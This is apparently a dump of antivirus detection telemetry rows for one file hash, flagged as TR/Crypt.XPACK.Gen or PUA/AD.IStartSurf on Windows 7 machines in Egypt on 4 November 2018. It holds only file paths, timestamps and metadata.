  Row(detection=Row(filename='tmp0023ab06', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ab06', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:03:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297116', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297116', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:39:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0028ff72', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0028ff72', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:25:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b630', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b630', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:15:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296fb4', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296fb4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:38:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294049', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294049', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:34:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293ece', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293ece', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:32:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290997', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290997', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:37:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e82d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e82d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:02:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238b23', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238b23', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:29:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297121', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297121', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:39:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029496f', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029496f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:42:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a6ba', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a6ba', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:59:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-091632-16d614a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-091632-16D614A7', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:16:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029524b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029524b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:58:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290e30', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290e30', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:42:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e05a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e05a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:55:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292c49', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292c49', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:17:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292003', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292003', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:03:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002914b8', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002914b8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:50:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297322', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297322', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:42:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291979', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291979', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:56:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292f66', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292f66', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:21:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029526b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029526b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:58:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023aa08', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023aa08', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:02:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090426-b5ef150f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-090426-B5EF150F', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:03:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002940b5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002940b5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:35:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291ff6', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291ff6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:03:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238908', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238908', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:26:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002391e6', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002391e6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:36:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090332-ae9a27be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085413-64085A6C\\AVSCAN-20181104-090332-AE9A27BE', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:03:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002977bb', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002977bb', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:49:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290910', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290910', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:36:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002916a8', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002916a8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:52:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296dfb', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296dfb', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:35:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e54c', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e54c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:58:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ecc5', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ecc5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:07:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290c3a', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290c3a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:40:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023d1f3', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023d1f3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:46:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023d096', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023d096', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:44:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002922a1', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002922a1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:06:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291133', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291133', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:46:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ec89', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ec89', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:07:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023d21e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023d21e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:46:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290c85', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290c85', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:40:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297515', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297515', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:45:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023d0a8', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023d0a8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:44:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290c59', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290c59', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:40:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292280', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292280', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:06:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291643', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291643', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:52:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002908b9', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002908b9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:36:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ece0', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ece0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:07:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029034c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029034c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:29:24Z'), dt=datetime.date(2018, 11, 4)),
